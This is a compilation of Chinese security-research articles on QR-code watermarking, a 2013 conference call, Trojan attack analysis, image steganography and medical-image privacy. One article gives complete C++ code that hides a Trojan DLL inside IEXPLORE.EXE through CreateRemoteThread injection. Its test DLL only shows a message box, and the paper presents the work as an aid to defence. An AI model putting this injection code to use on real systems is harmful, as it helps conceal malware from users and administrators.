[35] 胡敏,刘辉.基于特征点的自适应三维网格数字水印算法[J].合肥工业大学学报(自然科学版),2010,33(1):55-59.

[36] M. Hachani, A.Z. Ouled, S. Bahroun. Wavelet based watermarking on 3D irregular meshes[C]. 19th IEEE International Conference on Image Processing(ICIP),2012.

[37] Y.P. Wang, S.M. Hu. Optimization approach for 3D model watermarking by linear binary programming[J].Computer Aided Geometric Design, 2010,27(5): 395-404.

[38]陈力为. 中文信息处理丛书序言[M].北京:清华大学出版社,2000.

[39]俞士汶,朱学锋,贾玉祥. 汉语隐喻自动处理研究之概况[C].第四届文学与信息技术国际研讨会,2008.

[40] 谭良,吴波,刘震,等.一种基于混沌和小波变换的大容量音频信息隐藏算法[J].电子学报,2010,38(8):1812-1819.

[41] 丁玮,闫伟齐,齐东旭.基于置乱与融合的数字图象隐藏技术及其应用[J].中国图象图形学报,2000,5(8):644-649.

[42] 田云凯,贾传荧,王庆武.基于Arnold变换的图像置乱及其恢复[J].大连海事大学学报:自然科学版,2006,32(4):107-109.

[43] 彭万权,张承畅,冯文江,等.多阶幻方卷积码的构造及译码[J].电子学报,2013,41(1):123-130.

篇4

1.1 QR二维码的应用背景

随着中国3G技术的普及,以及手机本身性能的提高,二维码作为一种全新的信息存储、传递和识别技术迅速地融入到了社会生活当中,其保密和安全问题也越来越有研究价值,2012年铁道部出现了用户隐私资料信息被二维码泄密的问题,病毒也开始通过二维码传播。目前国内针对二维码数字加密的技术的论述并不多,在当前期刊网上有关二维码讨论的258篇论文也主要集中于二维码自身的编码解码规则,只有16篇是讨论二维码数字手段加密的。其中加密采取的主要手段是通过复杂昂贵的隐形印刷技术。而讨论数字加密的只是对一般图像都通用的结合水印加密,未能很好的结合QR二维码自身的编码规则,所能负载的加密信息量也极少[3]。

1.2 国内外二维码加密研究现状

目前,国内外关于二维码信息隐藏技术的文献不是很多,研究对象主要是四一七条码(Portable Data File417,PDF417码)和QR码。在国内,针对PDF417码的研究较多且以空域水印为主,在国外,以研究QR码居多,以频域水印为主。牛夏牧[7]等利用变形技术对PDF417码中的各组成单元宽度加以适量的变动,采用误差累积的方式实现隐藏信息的嵌入和提取。陈峥等[3]针对PDF417码,提出了基于边界移位的隐藏信息嵌入算法。赵博等[4]提出一种基于结构微调法的水印算法,对PDF417码的组成条空进行适量的微调,将信息隐藏进二维码中。晁玉海等[5]提出一种对隐藏信息进行扩频和映射处理,根据PDF417码自身结构特点,通过微调条码中的条和空将信息隐藏的方法。Ming Sun等[6]提出两种基于离散小波变换(Discrete Wavelet Transform,DWT)变换的QR码数字水印,分别可以嵌入随机序列和图片。Jau-Ji Shen等[7]针对PDF417码提出一种称作关联水印的盲水印算法,该算法可以提高水印的嵌入容量并可将PDF417码用于数据认证。

⑴二维码图和传统防伪制作技术(主要是印刷)相结合,避免码图被直接影印、拍照,比如采用隐形印刷等等;

⑵掌握二维码编码技术,对二维码码图本身做特殊处理(如加密、复合、变形等),这种方法的目的有二,一是可以让别人的识读软件无法识别码图,二是可以在这些码图中编入特别信息,以作防伪校验之用。

简而言之,一个采用特殊印刷技术,一个采用特殊编码,从而提高技术门槛也就提高了造假的成本与难度。本文研究算法基于第二种方式,对二维码码图进行特殊处理,达到嵌入 信息进行防伪校验目的。

2 适用于QR的数字水印算法

2.1 水印的嵌入算法

2.1.1 水印嵌入位置及表示方案

链码和QR二维码水印信息的位置选择和像素值改变方案,根据链码、改进的LSB算法和二维码的基本理论,本文结合处如下表示方案。QR码图像是由N*N个深色或者浅色的模块图形组成,实验中是黑色和白色模块。考虑水印需要的隐蔽性,我们选取黑色的正方形作为水印嵌入单元。假设QR码的一个模块图形的大小为M*M,其中M为模块的长度(高度),单位是像素。条码矩阵的大小为N*N。每个正方形基元占用的像素点为M/N。

如图2.1所示:跟四链码的结合方式为将正方形基元平分成四等份,每一块的大小为M/2N,选择其中的一块,按统一水印规则改变整个选中块的像素值,嵌入水印信息,按照链码方向的规则给四个方向的小矩阵编码为0,1,2,3,四幅图中的红色区域分别对应着0,1,2,3。这样每个黑色QR码的正方形基元便可以承载一位四进制的数。当图像格式为RGB三色图时,结合第一章所介绍的改进的LSB编码规则,每一块像素值按规则改变后又可表示为00,01,10,11的四进制,跟位置的编码规则相结合,每个正方形模块就可以表示一位十六进制的数,也就是4bit的信息。

2.1.2 水.印嵌入流程

如图2.2 水印算法的整体嵌入步骤:

第一步:根据基本信息编码出未加密的二维码举证,自左向右,自上而下,统计N*N黑色和白色模块的QR二维码可用来嵌入水印的黑色模块的个数,记为C,并记录下各个可用的黑色模块在二维码的二维矩阵中的位置。

第二步:依据伪指纹特征随机密钥生成技术,随机生成三个指纹特征数据记为T1、T2、T3,并将T1、T2、T3转码成和水印嵌入方式所采用的编码进制(八进制、十六进制等)相同的编码进制,统计出T1,T2,T3所需要的占用编码位数记为n1,n2,n3。

第三步:如果n1+n2+n3>c,则说明水印嵌入位置不足以嵌入所有的指纹特征数据,当嵌入位置不足时采用基于模拟退火算法竞争机制,解决各个特征信息之间采样数竞争问题,模拟退火的优势能保证了嵌入位置的随机性,和各个特征信息的均衡性。

第四步:依照模拟退火算法竞争机制产生的二维指纹矩阵加密位置对应表,对QR二维码图形进行加密。

2.2 水印的提取算法

如图2.3:首先,从加密的二维码图片中解码出二维码的基本信息。

将加密后的二维码图片记为map1和未水印加密的二维图片记为map2,导入解码程序中。

第二步:将相应的两幅图像做减法代数运算,提取图像中目标区域,给定阈值大小为水印差值的一半,将低于阈值的像素点看作相同像素点,差值取绝对值选取为了实现精确定位,因为两幅图像编码格式一致,除了不通目标区域以外,其他区域完全相同,包括图像大小等。

第三部:使用数学形态学方法,实现断线的连接,主要目的是保持目标区域边缘连续,为孤立点的去除做准备。第三步:使用改进中值滤波去除图像中孤立异常点,如果除了目标区域以外,其他区域完全相同,那么基本不需要去处异常点,在做加入噪声干扰实验时去除边缘毛边是一个需要除了的问题。

第四步:采用曲线全向跟踪技术,寻找目标区域的边缘轮廓,探查到所有目标区域边缘。

第五步:将图像按照二维码自身的编码规则分成N*N块,根据上图中提取去的各个嵌入水印的矩形区域的位置,并将区域大小经过阈值判断,去掉干扰点,定位出各个区域对应得编码值,返回二维矩阵各个嵌入水印值位置对应得值。和加密时候保存的加密二维矩阵值进行对比,进行水印验证。

3 实验

含有水印的QR码的识别和提取实验

算法稳定性实验,流程如下:

(1)产生一段随机长度和随机内容的文本T1。

(2)将文本T1编码为QR码图形Q1。

(3)计算Q1的水印容量大小。

(4)通过通过随机指纹发生器和模拟退火竞争机制产生水印信息W。

(5)向Q1中嵌入水印信息W得到含有水印的QR码图形Q2。

(6)识读Q2得到T2,并与原始编码内容T1对比,记录对比结果。

(7)从含有水印的QR码图形Q2中提取水印信息WR。

(8)比较W和WR,记录对比结果。

(9)重复1000次步骤(1)~(8)的试验,并计算QR码的识别正确率和水印嵌入和提取的正确率。

随机文本T包含英文字母、数字和常用标点符号。重复试验的次数为100次,最后记录实验结果并计算正确率。实验最终得到的数据是QR码的识别正确率为97%,嵌入和提取水印的正确率为95%。该实验表明,水印算法非常稳定,嵌入的水印不会影响到QR码的正确识别,并且水印信息的嵌入和提取不受水印内容和QR码载体图像的影响。

4 结论

提出了一种适用于QR码的鲁棒性和嵌入信息量都适中的水印算法,该算法用链码的方向编码和改进的LSB算法嵌入水印信息,保证水印信息不会改变QR码的图形结构,并确保嵌入的水印信息不会影响到QR码的正确识别。与现有的利用误差特性进行信息隐藏的算法相比,该算法极大程度增强了数字水印的隐蔽性,提高了水印信息的嵌入量。同时算法不会受到QR码的容量限制,并且适合电子保存和打印等多种形式,具有提取水印速度快,抗干扰能力强等优势。并且提出了由多种生物特征提取出的信息组成水印信息的方式,将二维码与用户绑定,实现了人码一体的认证功能。

[参考文献]

[l]何叶.基于二维条码的数字水印技术研究.长沙理工大学硕士学位论文.(2009).

[2]赵博.二维条码研究.西安电子科技大学硕士学位论文.(2007).

[3]纪兴中.基于二维条码技术的数字水印系统研究.浙江工业大学硕士学位论文.(2007).

[4]陈哲,张永林.数字水印技术在二维条码证件防伪中的应用.计算机工程与科学.28(4).42-44.(2006).

篇5

作者提交的论文,必须是未经发表或未并行地提交给其他学术会议或学报的原始论文。所有提交的论文都必须是匿名的,没有作者名字、单位名称、致谢或其他明显透露身份的内容。论文必须用英文,并以 PDF 或 PS 格式以电子方式提交。排版的字体大小为11pt,并且论文不能超过12页(A4纸)。所有提交的论文必须在无附录的情形下是可理解的,因为不要求程序委员阅读论文的附录。如果提交的论文未遵守上述投稿须知,论文作者将自己承担论文未通过形式审查而拒绝接受论文的风险。审稿将由3位程序委员匿名评审,评审结果为:以论文形式接受;以短文形式接受;拒绝接受。

ICICS2013会议论文集可在会议其间获取。凡接受论文的作者中,至少有1位必须参加会议,并在会议上报告论文成果。

投稿截止时间:2013年6月5日 通知接受时间:2013年7月24日 发表稿提交截止时间:2013年8月14日

会议主席:林东岱 中国科学院信息工程研究所 研究员

程序委员会主席:卿斯汉 中国科学院软件研究所、北京大学软件与微电子学院 教授

Jianying ZHOU博士 Institute for Infocomm Research,新加坡

篇6

木马程序(也称后门程序)是能被控制的运行在远程主机上的程序,由于木马程序是运行在远程主机上,所以进程的隐藏无疑是大家关心的焦点。

本文分析了WindowsNT/2000系统下进程隐藏的基本技术和方法,并着重讨论运用线程嫁接技术如何实现WindowsNT/2000系统中进程的隐藏。

1基本原理

在WIN95/98中,只需要将进程注册为系统服务就能够从进程查看器中隐形,可是这一切在WindowsNT/2000中却完全不同,无论木马从端口、启动文件上如何巧妙地隐藏自己,始终都不能躲过WindowsNT/2000的任务管理器,WindowsNT/2000的任务管理器均能轻松显示出木马进程,难道在WindowsNT/2000下木马真的再也无法隐藏自己的进程了?我们知道,在WINDOWS系统下,可执行文件主要是Exe和Com文件,这两种文件在运行时都有一个共同点,会生成一个独立的进程,寻找特定进程是我们发现木马的方法之一,随着入侵检测软件的不断发展,关联进程和SOCKET已经成为流行的技术,假设一个木马在运行时被检测软件同时查出端口和进程,我们基本上认为这个木马的隐藏已经完全失败。在WindowsNT/2000下正常情况用户进程对于系统管理员来说都是可见的,要想做到木马的进程隐藏,有两个办法,第一是让系统管理员看不见你的进程;第二是不使用进程。本文以第二种方法为例加以讨论,其基本原理是将自已的木马以线程方式嫁接于远程进程之中,远程进程则是合法的用户程序,这样用户管理者看到的只是合法进程,而无法发现木马线程的存在,从而达到隐藏的目的。

2实现方法

为了弄清实现方法,我们必须首先了解Windows系统的另一种"可执行文件"----DLL,DLL是DynamicLinkLibrary(动态链接库)的缩写,DLL文件是Windows的基础,因为所有的API函数都是在DLL中实现的。DLL文件没有程序逻辑,是由多个功能函数构成,它并不能独立运行,一般都是由进程加载并调用的。因为DLL文件不能独立运行,所以在进程列表中并不会出现DLL,假设我们编写了一个木马DLL,并且通过别的进程来运行它,那么无论是入侵检测软件还是进程列表中,都只会出现那个进程而并不会出现木马DLL,如果那个进程是可信进程,(例如浏览器程序IEXPLORE.EXE,没人会怀疑它是木马吧?)那么我们编写的DLL作为那个进程的一部分,也将成为被信赖的一员,也就达到了隐藏的目的。

运行DLL方法有多种,但其中最隐蔽的方法是采用动态嵌入技术,动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说,在Windows中的每个进程都有自己的私有内存空间,别的进程是不允许对这个私有空间进行操作的,但是实际上,我们仍然可以利用种种方法进入并操作进程的私有内存。动态嵌入技术有多种如:窗口Hook、挂接API、远程线程等,这里介绍一下远程线程技术,它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。

远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道,在进程中,可以通过CreateThread函数创建线程,被创建的新线程与主线程(就是进程启动时被同时自动建立的那个线程)共享地址空间以及其他的资源。但是很少有人知道,通过CreateRemoteThread也同样可以在另一个进程内创建新线程,被创建的远程线程同样可以共享远程进程(是远程进程)的地址空间,所以,实际上,我们通过一个远程线程,进入了远程进程的内存地址空间,也就拥有了那个远程进程相当的权限。

3实施步骤

1)用Process32Next()函数找到宿主进程,获取宿主进程ID,并用

OpenProcess()函数打开宿主进程。

2)用VirtualAllocEx()函数分配远程进程地址空间中的

内存。

3)用WriteProcessMemory()函数将待隐藏的DLL的路径名。

4)拷贝到步骤二已经分配的内存中。

5)用GetProcAddress()函数获取LoadlibraryA()函数的实地址(在kernel32.dll中)。

6)用CreateRemoteThread()函数在远程进程中创建一个线程。

7)它调用正确的LoadlibraryA()函数。

8)为它传递步骤二中分配的内存地址。

4具体实例

下面是在C++Builder4.0环境下编写的运用远程线程技术隐藏木马的程序代码:

#include<vcl.h>

#include<windows.h>

#include<stdio.h>

#include<tlhelp32.h>//该头文件包涵了进程操作的API函数

#pragmahdrstop

#include"Unit1.h"

#pragmapackage(smart_init)

#pragmaresource"*.dfm"

InsistingpszLibFileName;//存放待隐藏的DLL文件名

HANDLEhProcessSnap=NULL;//进程快照句柄

HANDLEhRemoteProcess;//远程进程句柄

LPVOIDpszLibFileRemote;//远程进程中分配给文件名的空间

HMODULEphmd;//存放kernel32.dll句柄

HANDLEhRemoteThread1=NULL;//存放远程线程句柄

TForm1*Form1;

//---------------------------------------------------------

__fastcallTForm1::TForm1(TComponent*Owner)

:TForm(Owner)

{

}

//---------------------------------------------------------

void__fastcallTForm1::Button1Click(TObject*Sender

{

PROCESSENTRY32pe32={0};

DWORDdwRemoteProcessId;

hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

//打开进程快照

if(hProcessSnap==(HANDLE)-1)

{

MessageBox(NULL,"CreateToolhelp32Snapshotfailed","",MB_OK);

exit(0);

}//失败返回

pe32.dwSize=sizeof(PROCESSENTRY32);

if(Process32Fi

rst(hProcessSnap,&pe32))//获取第一个进程

{

do{

AnsiStringte;

te=pe32.szExeFile;

if(te.Pos("iexplore.exe")||te.Pos("IEXPLORE.EXE"))

//找到宿主进程,以IEXPLORE.EXE为例

{dwRemoteProcessId=pe32.th32ProcessID;

break;

}

}

while(Process32Next(hProcessSnap,&pe32));//获取下一个进程

}

else

{

MessageBox(NULL,"取第一个进程失败","",MB_OK);

exit(0);

}

hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM

_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);

//打开远程进程

pszLibFileName=GetCurrentDir()+"\\"+"hide.dll";

//假设hide.dll是待隐藏的进程

intcb=(1+pszLibFileName.Length())*sizeof(char);//计算dll文件名长度

pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,

MEM_COMMIT,PAGE_READWRITE);

//申请存放文件名的空间

BOOLReturnCode=WriteProcessMemory(hRemoteProcess,

pszLibFileRemote,(LPVOID)pszLibFileName.c_str(),cb,NULL);

//把dll文件名写入申请的空间

phmd=GetModuleHandle("kernel32.dll");

LPTHREAD_START_ROUTINEfnStartAddr=(LPTHREAD_START_ROUTINE)

GetProcAddress(phmd,"LoadLibraryA");

//获取动态链接库函数地址

hRemoteThread1=CreateRemoteThread(hRemoteProcess,NULL,0,

pfnStartAddr,pszLibFileRemote,0,NULL);

//创建远程线

if(hRemoteThread1!=NULL)

CloseHandle(hRemoteThread1);//关闭远程线程

if(hProcessSnap!=NULL)

CloseHandle(hProcessSnap);//关闭进程快照

}

该程序编译后命名为RmtDll.exe,运行时点击界面上的按钮即可。

至此,远程嵌入顺利完成,为了试验我们的hide.dll是不是已经正常地在远程线程运行,我同样在C++Builder4.0环境下编写并编译了下面的hide.dll作为测试:

nclude<vcl.h>

#include<windows.h>

#pragmahdrstop

#pragmaargsused

BOOLWINAPIDllEntryPoint(HINSTANCEhinst,unsignedlongreason,void*lpReserved)

{

charszProcessId[64];

switch(reason)

{

caseDLL_PROCESS_ATTACH:

{//获取当前进程ID

itoa(GetCurrentProcessId(),szProcessId,10);

MessageBox(NULL,szProcessId,"RemoteDLL",MB_OK);

break;

}

default:

}

returnTRUE;

}

当使用RmtDll.exe程序将这个hide.dll嵌入IEXPLORE.EXE进程后假设PID=1208),该测试DLL弹出了1208字样的确认框,同时使用PS工具

也能看到:

ProcessID:1208

C:\WINNT\IEXPLORE.EXE(0x00400000)

……

C:\WINNT\hide.dll(0x100000000)

……

这证明hide.dll已经在IEXPLORE.EXE进程内正确地运行了。上面程序的头文件由编译器自动生成,未作改动,故略之。

5结束语

进程隐藏技术和方法有很多,而且这一技术发展也相当快,本文仅从一个侧面加以讨论,希望通过这一探讨让我们对进程隐藏技术有一个更清楚的认识,同时也为我们防范他人利用进程隐藏手段非法入侵提供参考,本文抛砖引玉,不当之处诚恳批评指正。

篇7

Trojan Attack Analysis and Response

Tang Yi

(Suzhou University of Science and Technology,Suzhou215009,China)

Abstract:This paper analyzes Trojan horse attacks,Trojan horse attacks are described details the main technology,and then launched a discussion of their responses,given the idea of testing procedures.

Keywords:Network monitoring;Network attacks;Communication hidden;Firewall

一、引言

据公安部一份调查报道显示,我国近几年的计算机用户感染病毒、木马的比例连续多年都在80%以上。特洛伊木马(Trojan horse,简称木马)来源于古希腊神话,Dan Edwards将这一名称引入计算机领域。木马和病毒、蠕虫之类的恶意程序一样,具有很大的危险与破坏性。能够删除或修改文件、上传和下载文件、盗用客户信息等。这些年伴随着木马在通信隐藏、程序隐藏等方面的不断发展,对付其越来越具有了难度。本文针对木马及其一般攻击的方式进行分析,并且探讨应对措施。

二、典型的木马攻击方式

木马的攻击方式,在本文主要是知其如何地进行感染与渗透,并且进行自身的隐藏,以及进行资料的搜集或者破坏等活动。木马其攻击过程的一个典型过程如下:当服务器端在目标计算机上被执行后,这时木马程序开启默认的端口从而实现监听,而在客户机给服务器的程序发出链接请求要求时,就进行响应:有关程序开始运行实现对答客户机的应答,这样就建立了服务器端程序跟客户端之间的连接。建立链接以后,指令从客户端来发出,而服务器中则进行指令的分析与执行,并将数据传送到客户端,以达到控制主机的目的。

三、木马攻击方式重要技术分析

(一)目标的感染与植入

向目标主机成功植入木马是木马成功运行、发挥作用的前提。这一过程通常包含伪装、捆绑、漏洞利用等一切可能利用的技术手段。这个过程主要有:1.脚本种植技术。利用网页木马,网页木马就是当用户浏览某网页时,自动下载并运行某“木马”程序。2.利用脚本方式植入。通过ScriPt、Activex及AsP、cGI交互脚本的方式植入。3.利用系统漏洞植入。利用系统的其他一些漏洞进行植入。4.远程安装。通过一定的方法把木马执行文件传送到目标主机的电脑里再进行远程安装。

(二)自动加载

在自动加载过程,本身也是一个隐藏着的行为。这需要在操作系统启动的时候同步地启动自身,以此达到让木马在宿主机中自动运行的目的。常见的木马启动方式有:启动项加入注册表;win.ini和System.ini中的load节中添加启动项;Autoexe.bat中添加;修改Boot.ini的配置;修改Explorer.exe参数等等。

(三)进程隐藏以及文件隐藏

早期的木马进程的隐藏采取的措施比较简单,Windows9x系统要实现进程的隐藏可以通过把木马程序注册为服务的方式来达到。在Windows Nt/2000下,有些进程名字改得和系统进程非常相似,迷惑使用的人;也有的利用HOOK API技术修改函数的入口点欺骗列举本地进程的api函数;当然更好的是使用Rundll32.exe设计技术运行木马本身,这样在进程列表中显示出来的就是Rundll而非木马的可执行文件名,文件管理器中不能正确地列出木马的可执行文件。除了进程隐藏,还需要对静态文件的隐藏于保密,这里不赘述了。

总而言之,各怀鬼胎的木马通过以上隐秘的方式,实现了对计算机的攻击。

四、木马防范及应对

(一)意识层面

提高警惕,养成良好的习惯。时刻关注电脑运行的情况,当出现异常情况时如:系统自行运行文件、系统变慢、网络流量异常等,要提高警惕,查杀系统。养成良好的上网习惯,不要上一些有问题的网站,不要随意下载免费软件,不要随意打开邮件附件。

(二)技术层面

1.系统漏洞补丁的更新,及时为系统打上最新补丁。2.利用一些专杀工具。由于木马专杀工具往往对特点木马有非常好的效果,可以考虑周期性的进行应用。3.使用防火墙或者系统自带的功能如IP安全策略、端口筛选等,关闭系统特定端口,以阻断木马服务端与控制端的连接。

五、木马检测程序设计思路

对于一般使用者,可以积极采用4中所述的方法进行应对。对于更加专业的人员,可以根据木马的特点开发应对木马的工具。目前主要的木马检测方法都是对被人们已经发现的木马程序在在植入系统过程中及在系统中运行时的这些静态特征进行分析,提取出这些静态特征,构建木马的静态特征库,从而进行静态特征检测。但是这种方法强烈依赖于对木马的各种隐蔽和变化特征的深刻了解,所以检测能力不足,对未知的木马更是无能为力、有根本性的缺陷,更好的方法是应用对动态行为监测之方法。考虑到木马行为的隐蔽性和目的的恶意性,从这两点区别入手,用动态的方法控制木马植入、隐蔽和恶意操作行为所需要的资源条件,监控木马运行、通信、启动的隐蔽行为和恶意操作,对木马进行检测和防范。当然,也可以从动静两方面结合来进行木马的监测与阻隔。

这些行为的实施,更加有赖于对木马攻击方式的了解,要看到木马技术一直处于发展与升级的过程中,所以应对它也决不能丧失警惕,需要不断发现其攻击方式的新技术、新特征,从而提出更好的应对方法。

参考文献:

[1]周宗元,孔健行,武克南.线程插入技术的研究与防范[J].电脑知识与技术(学术交流),2007,17

篇8

1 信息隐藏技术与传统加密技术

信息隐藏是把秘密信息隐藏到载体信息中,而在感官上不改变载体本身,实质上因为隐藏了秘密信息,虽然载体信息本身也做了修改,但人类感觉器官的具有不敏感性,而且数字多媒体信号本身具有冗余性,这使得加载了秘密信息后的信息与原有的载体信息在感官上没有明显区别,载密后的信息的使用价值也不改变。

信息隐藏技术与传统加密技术的目的都是为了保护秘密信息,但二者还是有一定区别。最主要的区别是信息隐藏技术对载体信号的改变在人的感官层面不容易被发现,可以将秘密信息隐藏于人人可见的载体中,而传统加密技术对秘密信息加密后产生的多数是没有意义的信息,容易被发现,从而有针对性的破解。换言之,通过信息隐藏技术载密后,信息在感官上没有明显变化,除了秘密发送和接收方可以访问载密信息。与加密技术结合使用称为有密钥信息隐藏,即在嵌入秘密信息前,先将秘密信息进行加密处理,同时生成一个密钥。在提取秘密信息时,拥有权限者先得到的是加密的秘密信息,要用发送方提供的正确的密钥,还原加密的秘密信息为明文。

信息隐藏技术主要有隐写术、数字水印技术、可视密码技术、潜信道、隐匿协议等方法;在具体应用中按载体信号的不同分为基于文本、基于数字图像、基于音频、基于视频等。

2 信息隐写与数字水印

隐写术是指把隐秘信息嵌入到宿主信息中来进行传输,并保证隐秘信息不被未授权的第三方发现。因此,隐写术要求大容量嵌入与较高的隐蔽性。

数字水印是基于版权保护的应用而产生的,指嵌入在数字产品中的信息。数字水印与隐写术的区别在于其应用的目的不同,隐写术的目的在于隐藏信息,而数字水印的目的在于版权保护,因此水印的鲁棒性要求较高,但嵌入容量要求较小。

3 信息隐写算法的评价

在评价信息隐藏算法时,根据信息隐藏的不同应用场合,有如下技术性能的要求:(1)不可检测性,指的是载密信号与原始信号具有相同的特点,不容易被检测出来。(2)不可感知性,指载密后的信息外观形态不因为嵌入的秘密信息而发生明显的感官变化,不易被发现是载有秘密的信息。(3)安全性,是指隐藏算法要有抗攻击能力,非授权用户即使知道该信息为载密信息而对其进行攻击,也不能破坏原有信息和提取出秘密信息。(4)鲁棒性,是对载密信号在传输过程中受到一些正常操作,载体中的隐藏信息的具有承受能力,不易损。(5)对称性,是指信息隐藏中秘密信息的嵌入和提取过程是互逆的,也就是嵌入秘密信息和提取秘密信息可以使用同一算法。(6)自恢复性,在信息传递过程中,某些操作或者变换会对载密信息造成较大的破坏。这时为了保证信息的可用,可根据破坏后留下的数据片段,恢复出秘密信息,即自恢复性。

在信息隐藏算法开发和研究过程中,人们希望可以满足以上所有的要求,但是在实际情况下,因为有些特性是互斥的,很难同时满足所有特性,可以根据实际应用场合及媒体特点侧重某些方面。通常来说,嵌入秘密信息的信息容量与算法的不可感知性和鲁棒性成反比,也就是说隐藏的信息量越大,载密后信息的越容易被发现和被损坏。

隐写术作为信息隐藏的一种应用,我们主要关注的性能参数是隐藏质量和隐藏容量。隐藏质量,是载密后对人类感官的影响程度。由于人类个体的差异,在判断同一个目标时,会有不同的评价,所以不能有效地评价含密载体与原始载体的差别大小。为了使评价更容易量化,不因为个体差异而无法准确形容和评价载密前后的差异,引入一个国际通用的评价标准峰值信噪比PSNR。PSNR是指最大可能功率和影响它的表示精度的破坏性噪声功率的比值。在隐写中用来评价载密前后信息的相似程度。秘密信息通过某个隐写算法嵌入到原始载体后,如果载密后图像与其原始载体之间的PNSR值越大,说明该算法的隐藏质量越好。但是PSNR的分数和人眼看到的视觉品质也不是完全一致,有可能PSNR较高者看起来的效果反而不如PSNR较低者。隐藏容量也叫做隐藏载荷ER,表示所嵌入的秘密信息位占整个载体图像像素点的百分比。多数算法都希望载体图像能够携带更多的信息,即有较大的隐藏容量,但隐藏容量和隐藏质量往往相互制约,当隐藏的信息容量变化时,质量也会随之变化。

4 隐写术工作原理及相关算法

在对信息隐写算法优化时主要通过两个方面的实现。一是通过人的感官特性,人眼对图像的视觉分成敏感的平滑区和迟钝的边缘区,对于平滑去减少隐藏容量,对于边缘区加大隐藏容量;二是图像也可以分区,称之为分块,对于不同特性的分块可以采用不同的嵌入算法。

主流的隐写算法是空域算法中的最低有效位LSB算法。该算法基本思想是将秘密信息嵌入到载体图像像素值的最不显著位也即最低有效位,从而达到隐藏秘密信息的目的,因为是最不显著位,所以改变这一位置对宿主图像的感官效果不产生影响。LSB的基本步骤是:把秘密信息转换为二进制数据,将秘密二进制数据与像素最低有效位对比,若相同,保留信息,否则将载体像素的最低有效位用最低秘密信息直接替换,就得到了载密二进制信息,最后将该二进制数据转换为十进制像素值,也就是含有秘密信息的图像。最小有效位算法容易实现,而且嵌入信息容量大,是当前各种衍生算法的根本核心。

本文在这里介绍一种基于JPEG图像的分块隐写算法。首先把秘密信息转化为二进制信息,将图像分成8*8的分块,根据量化后的离散余弦变换系数DCT,计算分块的不为零的交流系数个数。根据隐藏的容量的大小,确定阈值。根据阈值将图像块分成人眼敏感程度不同的三种类型,不同类型的分块采取不同的隐藏算法嵌入数据。人眼不敏感的子块,嵌入较大量信息,仍然可以保持较好的隐藏质量,反之人眼较敏感的分块,为了保证隐藏质量,嵌入较小量信息。在进行秘密信息提取时,分块提取也就是嵌入过程的逆过程,再把所有分块中提取的秘密信息合成原有秘密信息。通过实验数据表明,该算法有效地平衡了隐藏质量和隐藏容量之间的关系,同时避免了方块效应,从而在隐藏质量得到保证的前提下大幅提高了隐藏容量。

通过数字隐写完成秘密通信分为嵌入过程、传输过程和提取过程三个阶段。密秘信息通过特定嵌入算法隐藏到原始载体中(也可以将秘密信息用传统方法结合秘钥加密后嵌入),形成含密载体,通过传输信道将含密载体发送出去。接收方通过隐写检测区分是否为含密载体,若是,再结合密钥对含密载体使用提取算法,提取出秘密信息。

5 结束语

信息隐写技术现在已经成为了信息安全的一个热点,广泛应用于各国军事部门、安全部门的信息加密及情报传输等方面。目前数字图像信息隐藏技术已经比较完善和成熟,但音频和视频作为网络上新兴和主流的数字媒体,是信息隐藏技术更广阔的载体领域,而且人的视觉和听觉也有不敏感性,所以基于音频和视频的隐写算法研究也将是今后信息隐写技术的工作重点。

参考文献:

[1]江小帆,戴跃伟,茅耀斌.信息隐藏技术-方法与应用[M].北京:机械工业出版社,2001.

[2]Cheng-Hsing Yang.Inverted pattern approach to improve image quality of information hiding by LSBsubstitution.Pattern Recognition,Volume 41,Issue 8,August 2008,Pages 2674-2683.

[3]徐凯平,郑洪源,丁秋林.一种基于LSB和PVD的图像信息隐藏算法研究[J].计算机应用研究,2010,27(3):1068-1070.

篇9

基本思想是通过混沌系统运算出一个混沌序列,将这个序列按照事先选取的既定的算法或是排列方案进而进一步进行运算以生成新的一个序列。与此同时,为了保证原混沌序列的位置与计算后的新序列之间的变换位置是一一对应的,又进一步利用了混沌系统的遍历性。实验表明,这种通过由混沌系统得出的混沌序列的进而对其进一步运算得到的变化关系在应用到图像置乱后可以实现明显的图像置乱效果。同时为了改变加密图像的统计特性、图像像素值以及降低图像像素值间的相关性,也可以通过单个混沌序列或多个复合的混沌序列来实现改变。数字图像信息隐藏数字图像信息隐藏技术也可用于保护病人医学影像的隐私。基本思想是,将需要被加密的医学图像的数字信息隐藏在另外一幅无关的图像中,比如一幅公开图像。这幅图像要求具有一定的迷惑性、大众性,以便迷惑攻击者,能够降低转移其注意力,这样就降低了图像被攻击的几率;与此同时,通过一定算法改变加密图像的原有的统计特性。以达到保护被加密影像的目的。应用其中的调配融合算法、“中国拼图”算法可以使图像的信息隐藏达到一个高质量的水平。另外,还可以综合各种不同的算法的特点,将数字隐藏技术扩展到声音、图像等不同的信息载体中的信息隐藏需求中去。另外,近年来新兴的一种数字作品版权保护技术——数字图像水印技术[3],能够有效地保护作者以及出版商的合法权益不受侵犯,现已被广泛应用于印刷领域中,具有了广阔的使用价值和商用价值,成为多媒体及知识产权保护的有效手段之一。数字图像水印技术是信息隐藏技术研究领域的一个重要分支。为了显示创作者对其作品的所有权,这种隐藏技术将具有某种意义的数字水印利用数字嵌入方法将其隐藏在其作品(可以是多种信息载体,比如视频、图像、声音、文字等数字产品)中。在进行印刷品真伪验证时,可通过水印的检测、分析来保证数字信息的完整性及可靠性。数字图像分存数字图像分存技术是把一幅需要进行保护的数字图像分割成多幅图像进行传输。被分割后的图像不再具有某种特殊的意义成为无意义或是看起来杂乱无章的图像。也可将分割后图像进一步隐藏到另外几幅不相关的或是具有一定迷惑作用的图像中进行存储获传输。这类似于数据组的分包传输。这样可以避免因个别图像的传输丢失而造成病人隐私信息遭到泄露的危险,而且也起到在通信中个别被分割后的图像信息的丢失与泄露不会影响原始图像信息的泄露。数字图像分存技术的特点使窃密者窃取完整的原始图像的成本大大增加,而且也提高了病人图像隐私的保密程度同时,若将图像置乱技术、图像隐藏技术、图像分存技术三者结合起来将使图像的安全传输有了较高的可靠性。

